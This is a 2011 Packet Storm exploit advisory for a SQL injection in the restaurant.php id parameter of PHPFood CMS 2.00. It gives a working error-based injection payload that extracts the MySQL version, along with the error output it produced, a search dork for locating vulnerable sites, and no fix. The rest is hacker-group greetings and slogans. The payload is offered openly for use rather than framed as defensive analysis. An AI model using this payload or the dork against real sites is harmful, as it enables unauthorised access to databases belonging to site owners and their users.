PHPFood CMS 2.00 SQL Injection

2011-07-04T00:00:00
ID PACKETSTORM:102755
Type packetstorm
Reporter kaMtiEz
Modified 2011-07-04T00:00:00

Description

                                        
                                            `#############################################################################################################  
## PhpFood CMS (restaurant.php?id=) SQL Injection Vulnerability ##  
## Author : kaMtiEz (kamtiez@exploit-id.com<script type="text/javascript">  
/* <![CDATA[ */  
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();  
/* ]]> */  
</script>) ##  
## Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id ##  
## Date : 3 July, 2011 ##  
#############################################################################################################  
  
[ Software Information ]  
  
[+] Vendor : http://www.phpfood.com/  
[+] Download : http://www.phpfood.com/download.html  
[+] version : 2.00 or lower maybe also affected  
[+] Vulnerability : SQL INJECTION  
[+] Dork : "CiHuY"  
[+] LOCATION : INDONESIA - JOGJA  
  
#############################################################################################################  
  
[ Vulnerable File ]  
  
http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num]  
  
[ XpL ]  
  
http://127.0.0.1/[kaMtiEz]/restaurant.php?id=[num] and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1  
  
  
[ See It ]  
  
Duplicate entry '5.0.91-community1' for key 1 :D  
  
[ FIX ]  
  
dunno :">  
  
  
#############################################################################################################  
  
[ Thx TO ]  
  
[+] INDONESIANCODER - EXPLOIT-ID - MAGELANGCYBER TEAM - MALANGCYBER CREW - KILL-9  
[+] Tukulesto,arianom,el-farhatz,Jundab,Ibl13Z,Ulow,s1do3L,Boebefa,Hmei7,RyanAby,AlbertWired,GonzHack  
[+] Lagripe-Dz,KedAns-Dz,By_aGreSiF,t0r3x,Mboys,Contrex,Gh4mb4S,jos_ali_joe,k4l0ng666,n4sss,r3m1ck,k4mpr3t0  
[+] yur4kh4,xr0b0t,kido,trycyber,n4ck0,dan teman2 semuanya yang saya tak bisa sebutkan satu2 :D  
  
[ NOTE ]  
  
[+] Stop Dreaming , Lets Do it !  
[+] Jangan Takut , Luka Pasti Akan Sembuh :)  
  
[ QUOTE ]  
  
[+] INDONESIANCODER still r0x  
[+] nothing secure ..  
  
`